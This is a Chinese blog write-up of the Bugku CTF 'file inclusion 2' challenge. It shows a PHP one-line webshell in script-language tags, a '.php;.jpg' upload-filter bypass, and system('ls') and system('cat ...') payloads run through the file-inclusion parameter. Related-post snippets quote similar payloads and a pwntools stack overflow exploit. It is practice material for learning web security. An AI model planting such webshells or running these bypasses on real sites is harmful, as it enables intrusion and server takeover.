bugku-文件包含2 writeup

最新推荐文章于 2024-04-14 20:49:15 发布
最新推荐文章于 2024-04-14 20:49:15 发布
阅读量4.1k 收藏 4
点赞数 5
分类专栏: BugKu 文章标签: Web ctf writeup bugku 文件包含2  命令执行
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39629343/article/details/80148665
版权

文件包含2

flag格式:SKCTF{xxxxxxxxxxxxxxxx}
hint:文件包含

1.访问http://118.89.219.210:49166/查看源代码

这里写图片描述

2.将hello.php改成upload.php,访问

这里写图片描述
这里对上传的文件的格式和大小做了限制

3.上传一个图片马,burpsuite抓包改后缀为.php上传失败

这里写图片描述

4.这对文件的后缀也做了限制,%00截断不管用

这里写图片描述

5.换一种姿势上传,普通一句话会被过滤

这里构造<?=eval($_POST['shell']);>

<script language=php>
@eval($_POST[pupil]);
</script>

保存文件修改后缀为2333.php;.jpg,成功上传

/upload/201804141155474379.jpg

这里写图片描述

直接用图片路径菜刀是连不上的

使用包含文件的方式访问

这里写图片描述
页面是空白的

使用菜刀连接

还是没法连接成功…..

6.那就直接构造命令执行

<script language=php>system("ls")</script>

同理,修改后缀名为jpg,如233.php;.jpg,上传成功
这里写图片描述

7.访问图片的包含路径

http://118.89.219.210:49166/index.php?file=upload/201804141202562458.jpg

这里写图片描述
或者构造命令执行

<script language=php>system("cat 访问的文件名.txt")</script>

包含文件的方式直接访问.txt文件
这里写图片描述

Peithon
关注
  • 5
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugKuCTF套路满满的题--------文件包含2
qq_42133828的博客
12-24 1653
首先讲一下这道题的思路,文件包含,什么是文件包含?其实简单来说就是通过一个文件传入参数(构造语句)去访问另一个文件,从而得到你所想要的东西。 然而,这道题,除了文件包含的知识。还涉及到了文件上传的知识。毕竟,这两者总是相互存在在。。。。。 好了,接下来,开始解题: 首先进入的界面是一个欢迎界面,看URL里的参数得有一个参数file,查看源码可得有upload.php这个文件存在,那么改一下f...
Bugku 文件包含2 writeup 绕过过滤
zazazrt的博客
02-18 1701
首先附上网站源码http://123.206.31.85:49166/ index.php &lt;!-- upload.php --&gt; &lt;?php if(!isset($_GET['file'])) { header('Location: ./index.php?file=hello.php'); exit(); } ...
bugku 文件包含2
Superpig的博客
11-20 1166
分析 1、打开题目链接,发现url为http://123.206.31.85:49166/index.php?file=hello.php很明显的字眼file 2、然后看一下源代码,发现一个event,意思是按一下b会重定向到Bookmark Page,结果尝试了发现是骗人的。。 3、首先尝试改url为 ?file=php://filter/read=convert.base64-encode/r...
bugku-web-文件包含2
最新发布
qq_75121443的博客
04-14 338
啧啧啧,怎么说呢,这题出的挺诡异的,本来是考文件包含,结果不伦不类。这里试探结束,开始配合文件包含漏洞,上传图片。上传一个脚本,将图片后缀改为php。这就很离谱,上传的一句话居然用不了。提示是这个文件,访问这个文件。测试后后台为linux系统。各种绕过手法使用后无法绕过。上传成功,文件包含后发现。看到了第一行有一个注释。
bugku-文件包含2(文件包含漏洞)
烟敛寒林的博客
11-09 2652
本文介绍三种方法,还会讲到这道题菜刀的连接。 进入题目页面,没有什么特别的,只能右键查看源代码,发现提示需要跳转到 upload.php上传页面 方法一: ①新建一个txt文件写入 <script language=php>system("ls")</script> 后另存为 jpg 格式 ②选择浏览上传文件 ③访问 保存进去的文...
S2 AWD排位赛-9.zip
12-07
BugKu 2021 CTF AWD 排位赛 真题
2022HFCTF-线上赛官方Writeup1
08-04
随后读取了未知的 RSA 公钥 /etc/firmware.pub ,对第 8 字节开始的 128 字节进了公钥解密再然后 16 字节明 MD5。始有 zlib
2020-纵横杯-Writeup.pdf
03-15
2020年纵横杯CTF比赛Writeup 高清PDF版
---vulhub_Writeup:vulhub靶场个人writeup,转载引用请注明地址,坑点补充联系作者。
03-03
vulhub_Writeup 主要写一些个人在打vulhub靶场中自己遇到的问题和处理方法。作为分享与个人查询所用。 笔者从2020年11月开始自学网安,水平有限,如有问题,恳请指正。 电子邮件:
Defcon - 2015 - 初赛 - r0pbaby writeup-附件资源
03-05
Defcon - 2015 - 初赛 - r0pbaby writeup-附件资源
bugku杂项题writeup
11-22
bugku杂项题writeup
[Bugku CTF——Pwn] pwn2
Y_peak的博客
03-22 277
[Bugku CTF——Pwn] pwn2 题目地址:https://ctf.bugku.com/ 额,好久不写这么简单的题目了 利用栈溢出修改返回地址就好, 如果不会就去看看什么是栈溢出 exploit from pwn import * p = remote('114.67.246.176',11431) get_shell = 0x0000000000400751 payload = 'a' * (0x30 + 8) + p64(get_shell) p.send(payload) p.inter
文件包含2
WYJ____的博客
08-08 375
1.jpg的内容为: &lt;script language=php&gt;system("ls")&lt;/script&gt;      
BugKu - pwn2
Casuall的博客
07-06 3648
这道题来自于bugku旧平台的第二道pwn题,还是比较简单的,一个典型的缓冲区溢出题。 首先查看一下文件类型,file pwn2,可以看到是64位的程序。然后用64位IDA打开,查看程序的逻辑。 可以看到这个程序的逻辑比较简单,有一个read函数,这个函数一个危险函数,可能引发缓冲区溢出漏洞。常见的危险函数还有gets、strcpy、sprintf、scanf等。 然后查看字符串,看看是否有内置...
BugkuCTF-PWN题pwn2-overflow超详细讲解
am_03的博客
08-30 1962
解题思路 1)计算出get_shell_的地址偏移量 2)算出来之后就直接溢出到后门函数 知识点 x64函数调用规则 解题之前我们先学下linux x64的函数调用规则。 x64机器在调用某个函数前,比如int func(int a, int b, int c, int d, int e, int f, int g, int h),首先他会把前6个参数从左往右存入到寄存器rdi、rsi、rdx、rcx、r8、r9,其余参数存入到栈里,保存的顺序是从右往左入栈。比如abcdef会存入到寄存器里,然后一次入栈h
Writeup bugku刷题 pwn2
Migraine‘s Blog
05-13 2333
概述:bugku新出的pwn题,练一练手 关键字:栈溢出 x64 网址:https://ctf.bugku.com/challenges 分析一下代码,发现非常明显是x64下的栈溢出。 Pwntools生成shellcode >>> from pwn import * >>> context(os='linux...
BugkuCtf-pwn2-exp
weixin_30340745的博客
08-22 375
#!/usr/bin/env python from pwn import * p = process('./pwn2') payload = 'a' * 56 + p64(0x400751) p.recvuntil('?') p.sendline(payload) print p.recvall() 转载于:https://www.cnblo...
bugku ctf文件包含 writeup
l3oog1e的博客
05-25 6304
打开题目,直接显示代码<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>看到Request函数,很明显可以想到文件包含,这里hello是可控的,那么,就可以构造包含语句,?hello=1);show_source('f
oscp 2023 challenge writeup-medtech-csdn博客
10-29
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值